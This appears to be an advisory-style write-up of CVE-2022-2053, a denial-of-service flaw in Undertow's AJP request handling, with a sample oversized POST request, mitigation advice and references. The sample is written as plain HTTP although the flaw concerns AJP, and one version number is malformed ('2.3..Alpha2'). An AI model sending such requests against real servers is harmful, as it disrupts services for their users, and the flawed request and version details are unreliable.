A vulnerability (CVE-2022-2053) has been discovered in Undertow's AjpServerRequestConduit implementation which can lead to DoS (denial of service) attacks. This vulnerability occurs when a POST request via AJP (Apache JServ Protocol) exceeds the maxEntitySize limit. In this situation, Undertow closes the connection without sending a response to the client/proxy, resulting in backend workers being marked as in error state by front-end proxies like mod_cluster and mod_proxy_balancer.

Exploit Details

An attacker can exploit this vulnerability by sending a malicious POST request that exceeds the maxEntitySize limit. This will cause the front-end proxy to mark backend workers as in error state and not forward requests to them for a certain time period.

For example, in mod_cluster, this continues until the next STATUS request (10 seconds intervals) from the application server updates the server state. In the worst case, this can result in "All workers are in error state" and mod_cluster responding "503 Service Unavailable" for up to 10 seconds. In mod_proxy_balancer, the worker stays in error state until the "retry" timeout passes.

Below is an example of malicious POST request that exceeds the maxEntitySize limit

POST /vulnerable_endpoint HTTP/1.1
Host: target_server
Content-Length: 1048576
Content-Type: application/x-www-form-urlencoded

# The payload below is a very large string that will exceed the maxEntitySize limit
payload=...

Mitigation

This vulnerability has been fixed in Undertow 2.2.19.Final and Undertow 2.3..Alpha2. It is highly recommended to update to the latest versions of Undertow to protect against this vulnerability.

For those using mod_proxy_balancer, enabling "forcerecovery" setting (On by default) can mitigate the issue by forcing immediate recovery of all workers without considering the retry parameter when all workers are in error state. This, however, does not result in responding "503 Service Unavailable".

References

- Undertow GitHub Repository
- AjpServerRequestConduit Source Code
- Undertow 2.2.19.Final Release Notes
- Undertow 2.3..Alpha2 Release Notes

Conclusion

The Undertow's AjpServerRequestConduit vulnerability (CVE-2022-2053) can lead to denial of service (DoS) attacks if not appropriately mitigated. Updating to Undertow 2.2.19.Final or Undertow 2.3..Alpha2 and enabling "forcerecovery" setting in mod_proxy_balancer can help protect against these attacks.

Timeline

Published on: 08/05/2022 16:15:00 UTC
Last modified on: 08/11/2022 14:06:00 UTC